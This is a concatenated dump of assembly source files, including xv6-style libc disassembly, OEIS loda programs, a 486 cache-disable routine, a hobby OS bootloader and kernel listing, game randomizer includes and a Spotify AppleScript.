'p'){ f6b: 81 e1 f7 00 00 00 and $0xf7,%ecx f71: 83 f9 70 cmp $0x70,%ecx f74: 74 72 je fe8 <printf+0xe8> printint(fd, *ap, 16, 0); ap++; } else if(c == 's'){ f76: 83 f8 73 cmp $0x73,%eax f79: 0f 84 99 00 00 00 je 1018 <printf+0x118> s = "(null)"; while(*s != 0){ putc(fd, *s); s++; } } else if(c == 'c'){ f7f: 83 f8 63 cmp $0x63,%eax f82: 0f 84 08 01 00 00 je 1090 <printf+0x190> putc(fd, *ap); ap++; } else if(c == '%'){ f88: 83 f8 25 cmp $0x25,%eax f8b: 0f 84 ef 00 00 00 je 1080 <printf+0x180> write(fd, &c, 1); f91: 8d 45 e7 lea -0x19(%ebp),%eax f94: 83 ec 04 sub $0x4,%esp f97: c6 45 e7 25 movb $0x25,-0x19(%ebp) f9b: 6a 01 push $0x1 f9d: 50 push %eax f9e: ff 75 08 pushl 0x8(%ebp) fa1: e8 1c fe ff ff call dc2 <write> fa6: 83 c4 0c add $0xc,%esp fa9: 8d 45 e6 lea -0x1a(%ebp),%eax fac: 88 5d e6 mov %bl,-0x1a(%ebp) faf: 6a 01 push $0x1 fb1: 50 push %eax fb2: ff 75 08 pushl 0x8(%ebp) fb5: 83 c6 01 add $0x1,%esi } else { // Unknown % sequence. Print it to draw attention. putc(fd, '%'); putc(fd, c); } state = 0; fb8: 31 ff xor %edi,%edi write(fd, &c, 1); fba: e8 03 fe ff ff call dc2 <write> for(i = 0; fmt[i]; i++){ fbf: 0f b6 5e ff movzbl -0x1(%esi),%ebx write(fd, &c, 1); fc3: 83 c4 10 add $0x10,%esp for(i = 0; fmt[i]; i++){ fc6: 84 db test %bl,%bl fc8: 75 89 jne f53 <printf+0x53> } } } fca: 8d 65 f4 lea -0xc(%ebp),%esp fcd: 5b pop %ebx fce: 5e pop %esi fcf: 5f pop %edi fd0: 5d pop %ebp fd1: c3 ret fd2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi state = '%'; fd8: bf 25 00 00 00 mov $0x25,%edi fdd: e9 66 ff ff ff jmp f48 <printf+0x48> fe2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi printint(fd, *ap, 16, 0); fe8: 83 ec 0c sub $0xc,%esp feb: b9 10 00 00 00 mov $0x10,%ecx ff0: 6a 00 push $0x0 ff2: 8b 7d d4 mov -0x2c(%ebp),%edi ff5: 8b 45 08 mov 0x8(%ebp),%eax ff8: 8b 17 mov (%edi),%edx ffa: e8 61 fe ff ff call e60 <printint> ap++; fff: 89 f8 mov %edi,%eax 1001: 83 c4 10 add $0x10,%esp state = 0; 1004: 31 ff xor %edi,%edi ap++; 1006: 83 c0 04 add $0x4,%eax 1009: 89 45 d4 mov %eax,-0x2c(%ebp) 100c: e9 37 ff ff ff jmp f48 <printf+0x48> 1011: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi s = (char*)*ap; 1018: 8b 45 d4 mov -0x2c(%ebp),%eax 101b: 8b 08 mov (%eax),%ecx ap++; 101d: 83 c0 04 add $0x4,%eax 1020: 89 45 d4 mov %eax,-0x2c(%ebp) if(s == 0) 1023: 85 c9 test %ecx,%ecx 1025: 0f 84 8e 00 00 00 je 10b9 <printf+0x1b9> while(*s != 0){ 102b: 0f b6 01 movzbl (%ecx),%eax state = 0; 102e: 31 ff xor %edi,%edi s = (char*)*ap; 1030: 89 cb mov %ecx,%ebx while(*s != 0){ 1032: 84 c0 test %al,%al 1034: 0f 84 0e ff ff ff je f48 <printf+0x48> 103a: 89 75 d0 mov %esi,-0x30(%ebp) 103d: 89 de mov %ebx,%esi 103f: 8b 5d 08 mov 0x8(%ebp),%ebx 1042: 8d 7d e3 lea -0x1d(%ebp),%edi 1045: 8d 76 00 lea 0x0(%esi),%esi write(fd, &c, 1); 1048: 83 ec 04 sub $0x4,%esp s++; 104b: 83 c6 01 add $0x1,%esi 104e: 88 45 e3 mov %al,-0x1d(%ebp) write(fd, &c, 1); 1051: 6a 01 push $0x1 1053: 57 push %edi 1054: 53 push %ebx 1055: e8 68 fd ff ff call dc2 <write> while(*s != 0){ 105a: 0f b6 06 movzbl (%esi),%eax 105d: 83 c4 10 add $0x10,%esp 1060: 84 c0 test %al,%al 1062: 75 e4 jne 1048 <printf+0x148> 1064: 8b 75 d0 mov -0x30(%ebp),%esi state = 0; 1067: 31 ff xor %edi,%edi 1069: e9 da fe ff ff jmp f48 <printf+0x48> 106e: 66 90 xchg %ax,%ax printint(fd, *ap, 10, 1); 1070: 83 ec 0c sub $0xc,%esp 1073: b9 0a 00 00 00 mov $0xa,%ecx 1078: 6a 01 push $0x1 107a: e9 73 ff ff ff jmp ff2 <printf+0xf2> 107f: 90 nop write(fd, &c, 1); 1080: 83 ec 04 sub $0x4,%esp 1083: 88 5d e5 mov %bl,-0x1b(%ebp) 1086: 8d 45 e5 lea -0x1b(%ebp),%eax 1089: 6a 01 push $0x1 108b: e9 21 ff ff ff jmp fb1 <printf+0xb1> putc(fd, *ap); 1090: 8b 7d d4 mov -0x2c(%ebp),%edi write(fd, &c, 1); 1093: 83 ec 04 sub $0x4,%esp putc(fd, *ap); 1096: 8b 07 mov (%edi),%eax write(fd, &c, 1); 1098: 6a 01 push $0x1 ap++; 109a: 83 c7 04 add $0x4,%edi putc(fd, *ap); 109d: 88 45 e4 mov %al,-0x1c(%ebp) write(fd, &c, 1); 10a0: 8d 45 e4 lea -0x1c(%ebp),%eax 10a3: 50 push %eax 10a4: ff 75 08 pushl 0x8(%ebp) 10a7: e8 16 fd ff ff call dc2 <write> ap++; 10ac: 89 7d d4 mov %edi,-0x2c(%ebp) 10af: 83 c4 10 add $0x10,%esp state = 0; 10b2: 31 ff xor %edi,%edi 10b4: e9 8f fe ff ff jmp f48 <printf+0x48> s = "(null)"; 10b9: bb 78 13 00 00 mov $0x1378,%ebx while(*s != 0){ 10be: b8 28 00 00 00 mov $0x28,%eax 10c3: e9 72 ff ff ff jmp 103a <printf+0x13a> 10c8: 66 90 xchg %ax,%ax 10ca: 66 90 xchg %ax,%ax 10cc: 66 90 xchg %ax,%ax 10ce: 66 90 xchg %ax,%ax 000010d0 <free>: static Header base; static Header *freep; void free(void *ap) { 10d0: 55 push %ebp Header *bp, *p; bp = (Header*)ap - 1; for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr) 10d1: a1 90 18 00 00 mov 0x1890,%eax { 10d6: 89 e5 mov %esp,%ebp 10d8: 57 push %edi 10d9: 56 push %esi 10da: 53 push %ebx 10db: 8b 5d 08 mov 0x8(%ebp),%ebx bp = (Header*)ap - 1; 10de: 8d 4b f8 lea -0x8(%ebx),%ecx 10e1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr) 10e8: 39 c8 cmp %ecx,%eax 10ea: 8b 10 mov (%eax),%edx 10ec: 73 32 jae 1120 <free+0x50> 10ee: 39 d1 cmp %edx,%ecx 10f0: 72 04 jb 10f6 <free+0x26> if(p >= p->s.ptr && (bp > p || bp < p->s.ptr)) 10f2: 39 d0 cmp %edx,%eax 10f4: 72 32 jb 1128 <free+0x58> break; if(bp + bp->s.size == p->s.ptr){ 10f6: 8b 73 fc mov -0x4(%ebx),%esi 10f9: 8d 3c f1 lea (%ecx,%esi,8),%edi 10fc: 39 fa cmp %edi,%edx 10fe: 74 30 je 1130 <free+0x60> bp->s.size += p->s.ptr->s.size; bp->s.ptr = p->s.ptr->s.ptr; } else bp->s.ptr = p->s.ptr; 1100: 89 53 f8 mov %edx,-0x8(%ebx) if(p + p->s.size == bp){ 1103: 8b 50 04 mov 0x4(%eax),%edx 1106: 8d 34 d0 lea (%eax,%edx,8),%esi 1109: 39 f1 cmp %esi,%ecx 110b: 74 3a je 1147 <free+0x77> p->s.size += bp->s.size; p->s.ptr = bp->s.ptr; } else p->s.ptr = bp; 110d: 89 08 mov %ecx,(%eax) freep = p; 110f: a3 90 18 00 00 mov %eax,0x1890 } 1114: 5b pop %ebx 1115: 5e pop %esi 1116: 5f pop %edi 1117: 5d pop %ebp 1118: c3 ret 1119: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi if(p >= p->s.ptr && (bp > p || bp < p->s.ptr)) 1120: 39 d0 cmp %edx,%eax 1122: 72 04 jb 1128 <free+0x58> 1124: 39 d1 cmp %edx,%ecx 1126: 72 ce jb 10f6 <free+0x26> { 1128: 89 d0 mov %edx,%eax 112a: eb bc jmp 10e8 <free+0x18> 112c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi bp->s.size += p->s.ptr->s.size; 1130: 03 72 04 add 0x4(%edx),%esi 1133: 89 73 fc mov %esi,-0x4(%ebx) bp->s.ptr = p->s.ptr->s.ptr; 1136: 8b 10 mov (%eax),%edx 1138: 8b 12 mov (%edx),%edx 113a: 89 53 f8 mov %edx,-0x8(%ebx) if(p + p->s.size == bp){ 113d: 8b 50 04 mov 0x4(%eax),%edx 1140: 8d 34 d0 lea (%eax,%edx,8),%esi 1143: 39 f1 cmp %esi,%ecx 1145: 75 c6 jne 110d <free+0x3d> p->s.size += bp->s.size; 1147: 03 53 fc add -0x4(%ebx),%edx freep = p; 114a: a3 90 18 00 00 mov %eax,0x1890 p->s.size += bp->s.size; 114f: 89 50 04 mov %edx,0x4(%eax) p->s.ptr = bp->s.ptr; 1152: 8b 53 f8 mov -0x8(%ebx),%edx 1155: 89 10 mov %edx,(%eax) } 1157: 5b pop %ebx 1158: 5e pop %esi 1159: 5f pop %edi 115a: 5d pop %ebp 115b: c3 ret 115c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 00001160 <malloc>: return freep; } void* malloc(uint nbytes) { 1160: 55 push %ebp 1161: 89 e5 mov %esp,%ebp 1163: 57 push %edi 1164: 56 push %esi 1165: 53 push %ebx 1166: 83 ec 0c sub $0xc,%esp Header *p, *prevp; uint nunits; nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1; 1169: 8b 45 08 mov 0x8(%ebp),%eax if((prevp = freep) == 0){ 116c: 8b 15 90 18 00 00 mov 0x1890,%edx nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1; 1172: 8d 78 07 lea 0x7(%eax),%edi 1175: c1 ef 03 shr $0x3,%edi 1178: 83 c7 01 add $0x1,%edi if((prevp = freep) == 0){ 117b: 85 d2 test %edx,%edx 117d: 0f 84 9d 00 00 00 je 1220 <malloc+0xc0> 1183: 8b 02 mov (%edx),%eax 1185: 8b 48 04 mov 0x4(%eax),%ecx base.s.ptr = freep = prevp = &base; base.s.size = 0; } for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){ if(p->s.size >= nunits){ 1188: 39 cf cmp %ecx,%edi 118a: 76 6c jbe 11f8 <malloc+0x98> 118c: 81 ff 00 10 00 00 cmp $0x1000,%edi 1192: bb 00 10 00 00 mov $0x1000,%ebx 1197: 0f 43 df cmovae %edi,%ebx p = sbrk(nu * sizeof(Header)); 119a: 8d 34 dd 00 00 00 00 lea 0x0(,%ebx,8),%esi 11a1: eb 0e jmp 11b1 <malloc+0x51> 11a3: 90 nop 11a4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){ 11a8: 8b 02 mov (%edx),%eax if(p->s.size >= nunits){ 11aa: 8b 48 04 mov 0x4(%eax),%ecx 11ad: 39 f9 cmp %edi,%ecx 11af: 73 47 jae 11f8 <malloc+0x98> p->s.size = nunits; } freep = prevp; return (void*)(p + 1); } if(p == freep) 11b1: 39 05 90 18 00 00 cmp %eax,0x1890 11b7: 89 c2 mov %eax,%edx 11b9: 75 ed jne 11a8 <malloc+0x48> p = sbrk(nu * sizeof(Header)); 11bb: 83 ec 0c sub $0xc,%esp 11be: 56 push %esi 11bf: e8 66 fc ff ff call e2a <sbrk> if(p == (char*)-1) 11c4: 83 c4 10 add $0x10,%esp 11c7: 83 f8 ff cmp $0xffffffff,%eax 11ca: 74 1c je 11e8 <malloc+0x88> hp->s.size = nu; 11cc: 89 58 04 mov %ebx,0x4(%eax) free((void*)(hp + 1)); 11cf: 83 ec 0c sub $0xc,%esp 11d2: 83 c0 08 add $0x8,%eax 11d5: 50 push %eax 11d6: e8 f5 fe ff ff call 10d0 <free> return freep; 11db: 8b 15 90 18 00 00 mov 0x1890,%edx if((p = morecore(nunits)) == 0) 11e1: 83 c4 10 add $0x10,%esp 11e4: 85 d2 test %edx,%edx 11e6: 75 c0 jne 11a8 <malloc+0x48> return 0; } } 11e8: 8d 65 f4 lea -0xc(%ebp),%esp return 0; 11eb: 31 c0 xor %eax,%eax } 11ed: 5b pop %ebx 11ee: 5e pop %esi 11ef: 5f pop %edi 11f0: 5d pop %ebp 11f1: c3 ret 11f2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi if(p->s.size == nunits) 11f8: 39 cf cmp %ecx,%edi 11fa: 74 54 je 1250 <malloc+0xf0> p->s.size -= nunits; 11fc: 29 f9 sub %edi,%ecx 11fe: 89 48 04 mov %ecx,0x4(%eax) p += p->s.size; 1201: 8d 04 c8 lea (%eax,%ecx,8),%eax p->s.size = nunits; 1204: 89 78 04 mov %edi,0x4(%eax) freep = prevp; 1207: 89 15 90 18 00 00 mov %edx,0x1890 } 120d: 8d 65 f4 lea -0xc(%ebp),%esp return (void*)(p + 1); 1210: 83 c0 08 add $0x8,%eax } 1213: 5b pop %ebx 1214: 5e pop %esi 1215: 5f pop %edi 1216: 5d pop %ebp 1217: c3 ret 1218: 90 nop 1219: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi base.s.ptr = freep = prevp = &base; 1220: c7 05 90 18 00 00 94 movl $0x1894,0x1890 1227: 18 00 00 122a: c7 05 94 18 00 00 94 movl $0x1894,0x1894 1231: 18 00 00 base.s.size = 0; 1234: b8 94 18 00 00 mov $0x1894,%eax 1239: c7 05 98 18 00 00 00 movl $0x0,0x1898 1240: 00 00 00 1243: e9 44 ff ff ff jmp 118c <malloc+0x2c> 1248: 90 nop 1249: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi prevp->s.ptr = p->s.ptr; 1250: 8b 08 mov (%eax),%ecx 1252: 89 0a mov %ecx,(%edx) 1254: eb b1 jmp 1207 <malloc+0xa7>
programs/oeis/035/A035597.asm
karttu/loda
1
5750
; A035597: Number of points of L1 norm 3 in cubic lattice Z^n. ; 0,2,12,38,88,170,292,462,688,978,1340,1782,2312,2938,3668,4510,5472,6562,7788,9158,10680,12362,14212,16238,18448,20850,23452,26262,29288,32538,36020,39742,43712,47938,52428,57190,62232,67562,73188,79118,85360,91922,98812,106038,113608,121530,129812,138462,147488,156898,166700,176902,187512,198538,209988,221870,234192,246962,260188,273878,288040,302682,317812,333438,349568,366210,383372,401062,419288,438058,457380,477262,497712,518738,540348,562550,585352,608762,632788,657438,682720,708642,735212,762438,790328,818890,848132,878062,908688,940018,972060,1004822,1038312,1072538,1107508,1143230,1179712,1216962,1254988,1293798,1333400,1373802,1415012,1457038,1499888,1543570,1588092,1633462,1679688,1726778,1774740,1823582,1873312,1923938,1975468,2027910,2081272,2135562,2190788,2246958,2304080,2362162,2421212,2481238,2542248,2604250,2667252,2731262,2796288,2862338,2929420,2997542,3066712,3136938,3208228,3280590,3354032,3428562,3504188,3580918,3658760,3737722,3817812,3899038,3981408,4064930,4149612,4235462,4322488,4410698,4500100,4590702,4682512,4775538,4869788,4965270,5061992,5159962,5259188,5359678,5461440,5564482,5668812,5774438,5881368,5989610,6099172,6210062,6322288,6435858,6550780,6667062,6784712,6903738,7024148,7145950,7269152,7393762,7519788,7647238,7776120,7906442,8038212,8171438,8306128,8442290,8579932,8719062,8859688,9001818,9145460,9290622,9437312,9585538,9735308,9886630,10039512,10193962,10349988,10507598,10666800,10827602,10990012,11154038,11319688,11486970,11655892,11826462,11998688,12172578,12348140,12525382,12704312,12884938,13067268,13251310,13437072,13624562,13813788,14004758,14197480,14391962,14588212,14786238,14986048,15187650,15391052,15596262,15803288,16012138,16222820,16435342,16649712,16865938,17084028,17303990,17525832,17749562,17975188,18202718,18432160,18663522,18896812,19132038,19369208,19608330,19849412,20092462,20337488,20584498 mov $1,$0 pow $0,3 mul $0,2 add $1,$0 div $1,3 mul $1,2
extra/ASM 8086/cache486.asm
jfitz/code-stat
0
165550
Disables the cache on a 486 and Pentium processor ; cache disable routine ; public DisableCache code segment ; simple but effective for demonstration purposes ;* DisableCache() * ;* * ;* This routine disables cache(s) on a 486 or Pentium processor * ;* * ;* NOTE: due to the protection schemes incorporated into the 486 and * ;* Pentium processors, it will NOT work in virtual 8086 mode. * ;* * ;* written on Thursday, 2 November 1995 by <NAME> * ;* and released to the public domain by the author * .486P CR0_CD equ 040000000h ; Cache Disable bit of CR0 CR0_NW equ 020000000h ; Not Write-through bit of CR0 DisableCache proc pushf ; save the flags push eax ; save eax cli ; disable interrupts while we do this mov eax,cr0 ; read CR0 or eax,CR0_CD ; set CD but not NW bit of CR0 mov cr0,eax ; cache is now disabled wbinvd ; flush and invalidate cache ; the cache is effectively disabled at this point, but memory ; consistency will be maintained. To completely disable cache, ; the following two lines may used as well: or eax,CR0_NW ; now set the NW bit mov cr0,eax ; turn off the cache entirely pop eax ; restore eax popf ; restore the flags ret ; return to caller DisableCache endp code ends end
oeis/167/A167820.asm
neoneye/loda-programs
11
24390
<gh_stars>10-100 ; A167820: Subsequence of A167709 whose indices are congruent to 0 mod 5, i.e., a(n) = A167709(5*n). ; Submitted by <NAME>(w4) ; 0,351,119340,40575249,13795465320,4690417633551,1594728199942020,542202897562653249,184347390443102162640,62677570547757172644351,21310189638846995596916700,7245401799637430745779033649,2463415301687087606569274523960,837553957171810148802807559112751,284765882023113763505348000823811380,96819562333901507781669517472536756449,32918366427644489532004130592661673381280,11192147765836792539373622731987496412878751,3805297322018081818897499724745156118705394060 lpb $0 sub $0,1 mov $1,$3 mul $1,338 add $2,13 add $2,$1 add $3,$2 lpe mov $0,$2 mul $0,27
OSDev/Try-0/src/boot/mbr.asm
Ashwin-Paudel/Tries
0
88187
; ; mbr.asm ; KripayaOS ; [bits 16] [org 0x7c00] ; The kernel's entry point KERNEL_OFFSET equ 0x1000 ; Store the bootdrive in the dl regester mov [BOOT_DRIVE], dl ; Set up the stack mov bp, 0x9000 mov sp, bp call clear16 ; Let the user know we're in 16 bit mode mov bx, msg_16_boot call print16 call load_kernel mov bx, msg_32_switch call print16 call switch32bit ; If the src decides the return, call the src again jmp $ %include "src/boot/16/disk.asm" %include "src/boot/32/gdt.asm" %include "src/boot/16/switch_32.asm" %include "src/boot/16/print.asm" %include "src/boot/32/print.asm" ; We have to switch back to 16 bit mode since we're in 32 bit mode [bits 16] load_kernel: mov bx, msg_kernel_load call print16 mov bx, KERNEL_OFFSET ; bx -> destination drive mov dh, 50 ; dh -> number of sectors mov dl, [BOOT_DRIVE] ; dl -> boot disk call disk_load ; Call the disk_load function ret [bits 32] start32: call KERNEL_OFFSET ; Let the src control jmp $ ; Call the src again if it loops ; Do an infinite loop .loop: jmp $ msg_16_boot: db `\rSystem -> Booted in 16 Bit Mode\n`, 0 msg_32_switch: db `\rSystem -> Switched to 32 Bit Mode\n`, 0 msg_kernel_load: db `\rSystem -> Loaded Kernel into memory\n`, 0 ; The boot driver variable BOOT_DRIVE db 0 ; Padding times 510-($-$$) db 0 db 0x55 db 0xaa
asm/doorrando.asm
codemann8/ALttPDoorRandomizer
3
18005
<gh_stars>1-10 !add = "clc : adc" !addl = "clc : adc.l" !sub = "sec : sbc" !bge = "bcs" !blt = "bcc" ; Free RAM notes ; Normal doors use $AB-AC for scrolling indicator ; Normal doors use $FE to store the trap door indicator ; Normal doors use $045e to store Y coordinate when transitioning to in-room stairs ; Normal doors use $045f to determine the order in which supertile quadrants are drawn ; Straight stairs use $046d to store X coordinate on animation start ; Spiral doors use $045e to store stair type ; Gfx uses $b1 to for sub-sub-sub-module thing ; Hooks into various routines incsrc drhooks.asm ;Main Code org $278000 ;138000 db $44, $52 ;DR DRMode: dw 0 DRFlags: dw 0 DRScroll: db 0 OffsetTable: dw -8, 8 incsrc normal.asm incsrc scroll.asm incsrc spiral.asm incsrc gfx.asm incsrc keydoors.asm incsrc overrides.asm incsrc edges.asm incsrc math.asm incsrc hudadditions.asm incsrc dr_lobby.asm warnpc $279C00 incsrc doortables.asm warnpc $288000 ; deals with own hooks incsrc keydropshuffle.asm incsrc owrando.asm
MTMR/AppleScripts/Spotify.next.scpt
FedorZaytsev/MTMR
3,715
2396
if application "Spotify" is running then tell application "Spotify" if player state is playing then next track end if end tell end if
oeis/295/A295897.asm
neoneye/loda-programs
11
4583
<reponame>neoneye/loda-programs<gh_stars>10-100 ; A295897: Numbers in whose binary expansion there are no 1-runs of odd length followed by a 0 to their right. ; Submitted by <NAME> ; 0,1,3,6,7,12,13,15,24,25,27,30,31,48,49,51,54,55,60,61,63,96,97,99,102,103,108,109,111,120,121,123,126,127,192,193,195,198,199,204,205,207,216,217,219,222,223,240,241,243,246,247,252,253,255,384,385,387,390,391,396,397,399,408,409,411,414,415,432,433,435,438,439,444,445,447,480,481,483,486,487,492,493,495,504,505,507,510,511,768,769,771,774,775,780,781,783,792,793,795 seq $0,22340 ; Even Fibbinary numbers (A003714); also 2*Fibbinary(n). mul $0,3 div $0,4
SysCore/Kernel/Debug/main.asm
pmache/heinanos
0
25772
<reponame>pmache/heinanos<filename>SysCore/Kernel/Debug/main.asm ; Listing generated by Microsoft (R) Optimizing Compiler Version 14.00.50727.42 TITLE c:\Users\Heinan\Documents\Visual Studio 2005\Projects\HeinanOS\SysCore\Kernel\main.cpp .686P .XMM include listing.inc .model flat INCLUDELIB LIBCMT INCLUDELIB OLDNAMES PUBLIC ?logo@@3PADA ; logo _DATA SEGMENT ?logo@@3PADA DD FLAT:$SG2688 ; logo _DATA ENDS CONST SEGMENT $SG2688 DB 'HeinanOS ', 0aH, 'Copyright (C) <NAME> 2010', 0aH DB 0aH, 0aH, 00H ORG $+1 $SG2727 DB 'PIC, PIT, and exception handlers are installed!', 0aH, 0aH DB 00H ORG $+6 $SG2728 DB 'Hitting any key will fire the default HAL handlers as cu' DB 'rrently', 0aH, 00H ORG $+3 $SG2729 DB 'no keyboard driver is installed.', 0aH, 0aH, 00H ORG $+1 $SG2730 DB 'Your cpu vender: %s ', 0aH, 0aH, 00H ORG $+1 $SG2734 DB 'Current tick count: %i', 00H CONST ENDS PUBLIC _main EXTRN ?get_tick_count@@YAHXZ:PROC ; get_tick_count EXTRN ?DebugPrintf@@YAHPBDZZ:PROC ; DebugPrintf EXTRN ?get_cpu_vender@@YAPBDXZ:PROC ; get_cpu_vender EXTRN ?DebugPuts@@YAXPAD@Z:PROC ; DebugPuts EXTRN ?DebugSetColor@@YAII@Z:PROC ; DebugSetColor EXTRN ?DebugGotoXY@@YAXII@Z:PROC ; DebugGotoXY EXTRN ?DebugClrScr@@YAXE@Z:PROC ; DebugClrScr EXTRN ?simd_fpu_fault@@YAXIII@Z:PROC ; simd_fpu_fault EXTRN ?machine_check_abort@@YAXIII@Z:PROC ; machine_check_abort EXTRN ?alignment_check_fault@@YAXIIII@Z:PROC ; alignment_check_fault EXTRN ?fpu_fault@@YAXIII@Z:PROC ; fpu_fault EXTRN ?page_fault@@YAXIIII@Z:PROC ; page_fault EXTRN ?general_protection_fault@@YAXIIII@Z:PROC ; general_protection_fault EXTRN ?stack_fault@@YAXIIII@Z:PROC ; stack_fault EXTRN ?no_segment_fault@@YAXIIII@Z:PROC ; no_segment_fault EXTRN ?invalid_tss_fault@@YAXIIII@Z:PROC ; invalid_tss_fault EXTRN ?double_fault_abort@@YAXIIII@Z:PROC ; double_fault_abort EXTRN ?no_device_fault@@YAXIII@Z:PROC ; no_device_fault EXTRN ?invalid_opcode_fault@@YAXIII@Z:PROC ; invalid_opcode_fault EXTRN ?bounds_check_fault@@YAXIII@Z:PROC ; bounds_check_fault EXTRN ?overflow_trap@@YAXIII@Z:PROC ; overflow_trap EXTRN ?breakpoint_trap@@YAXIII@Z:PROC ; breakpoint_trap EXTRN ?nmi_trap@@YAXIII@Z:PROC ; nmi_trap EXTRN ?single_step_trap@@YAXIII@Z:PROC ; single_step_trap EXTRN ?setvect@@YAXHA6AXXZ@Z:PROC ; setvect EXTRN ?divide_by_zero_fault@@YAXIII@Z:PROC ; divide_by_zero_fault EXTRN ?enable@@YAXXZ:PROC ; enable EXTRN ?hal_initialize@@YAHXZ:PROC ; hal_initialize ; Function compile flags: /Ogtpy ; File c:\users\heinan\documents\visual studio 2005\projects\heinanos\syscore\kernel\main.cpp _TEXT SEGMENT _main PROC ; 20 : ; 21 : //! Initialize hal driver ; 22 : hal_initialize (); call ?hal_initialize@@YAHXZ ; hal_initialize ; 23 : ; 24 : //! enable all interrupts ; 25 : enable (); call ?enable@@YAXXZ ; enable ; 26 : ; 27 : //! install our exception handlers ; 28 : setvect (0,(void (__cdecl &)(void))divide_by_zero_fault); push OFFSET ?divide_by_zero_fault@@YAXIII@Z ; divide_by_zero_fault push 0 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 29 : setvect (1,(void (__cdecl &)(void))single_step_trap); push OFFSET ?single_step_trap@@YAXIII@Z ; single_step_trap push 1 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 30 : setvect (2,(void (__cdecl &)(void))nmi_trap); push OFFSET ?nmi_trap@@YAXIII@Z ; nmi_trap push 2 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 31 : setvect (3,(void (__cdecl &)(void))breakpoint_trap); push OFFSET ?breakpoint_trap@@YAXIII@Z ; breakpoint_trap push 3 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 32 : setvect (4,(void (__cdecl &)(void))overflow_trap); push OFFSET ?overflow_trap@@YAXIII@Z ; overflow_trap push 4 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 33 : setvect (5,(void (__cdecl &)(void))bounds_check_fault); push OFFSET ?bounds_check_fault@@YAXIII@Z ; bounds_check_fault push 5 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 34 : setvect (6,(void (__cdecl &)(void))invalid_opcode_fault); push OFFSET ?invalid_opcode_fault@@YAXIII@Z ; invalid_opcode_fault push 6 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 35 : setvect (7,(void (__cdecl &)(void))no_device_fault); push OFFSET ?no_device_fault@@YAXIII@Z ; no_device_fault push 7 call ?setvect@@YAXHA6AXXZ@Z ; setvect add esp, 64 ; 00000040H ; 36 : setvect (8,(void (__cdecl &)(void))double_fault_abort); push OFFSET ?double_fault_abort@@YAXIIII@Z ; double_fault_abort push 8 call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 37 : setvect (10,(void (__cdecl &)(void))invalid_tss_fault); push OFFSET ?invalid_tss_fault@@YAXIIII@Z ; invalid_tss_fault push 10 ; 0000000aH call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 38 : setvect (11,(void (__cdecl &)(void))no_segment_fault); push OFFSET ?no_segment_fault@@YAXIIII@Z ; no_segment_fault push 11 ; 0000000bH call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 39 : setvect (12,(void (__cdecl &)(void))stack_fault); push OFFSET ?stack_fault@@YAXIIII@Z ; stack_fault push 12 ; 0000000cH call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 40 : setvect (13,(void (__cdecl &)(void))general_protection_fault); push OFFSET ?general_protection_fault@@YAXIIII@Z ; general_protection_fault push 13 ; 0000000dH call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 41 : setvect (14,(void (__cdecl &)(void))page_fault); push OFFSET ?page_fault@@YAXIIII@Z ; page_fault push 14 ; 0000000eH call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 42 : setvect (16,(void (__cdecl &)(void))fpu_fault); push OFFSET ?fpu_fault@@YAXIII@Z ; fpu_fault push 16 ; 00000010H call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 43 : setvect (17,(void (__cdecl &)(void))alignment_check_fault); push OFFSET ?alignment_check_fault@@YAXIIII@Z ; alignment_check_fault push 17 ; 00000011H call ?setvect@@YAXHA6AXXZ@Z ; setvect add esp, 64 ; 00000040H ; 44 : setvect (18,(void (__cdecl &)(void))machine_check_abort); push OFFSET ?machine_check_abort@@YAXIII@Z ; machine_check_abort push 18 ; 00000012H call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 45 : setvect (19,(void (__cdecl &)(void))simd_fpu_fault); push OFFSET ?simd_fpu_fault@@YAXIII@Z ; simd_fpu_fault push 19 ; 00000013H call ?setvect@@YAXHA6AXXZ@Z ; setvect ; 46 : ; 47 : //! clear and init display ; 48 : DebugClrScr (0x13); push 19 ; 00000013H call ?DebugClrScr@@YAXE@Z ; DebugClrScr ; 49 : DebugGotoXY (0,0); push 0 push 0 call ?DebugGotoXY@@YAXII@Z ; DebugGotoXY ; 50 : DebugSetColor (0x17); push 23 ; 00000017H call ?DebugSetColor@@YAII@Z ; DebugSetColor ; 51 : ; 52 : //! render text and logo ; 53 : DebugPuts (logo); mov eax, DWORD PTR ?logo@@3PADA ; logo push eax call ?DebugPuts@@YAXPAD@Z ; DebugPuts ; 54 : DebugSetColor (0x17); push 23 ; 00000017H call ?DebugSetColor@@YAII@Z ; DebugSetColor ; 55 : DebugPuts ("PIC, PIT, and exception handlers are installed!\n\n"); push OFFSET $SG2727 call ?DebugPuts@@YAXPAD@Z ; DebugPuts ; 56 : DebugPuts ("Hitting any key will fire the default HAL handlers as currently\n"); push OFFSET $SG2728 call ?DebugPuts@@YAXPAD@Z ; DebugPuts ; 57 : DebugPuts ("no keyboard driver is installed.\n\n"); push OFFSET 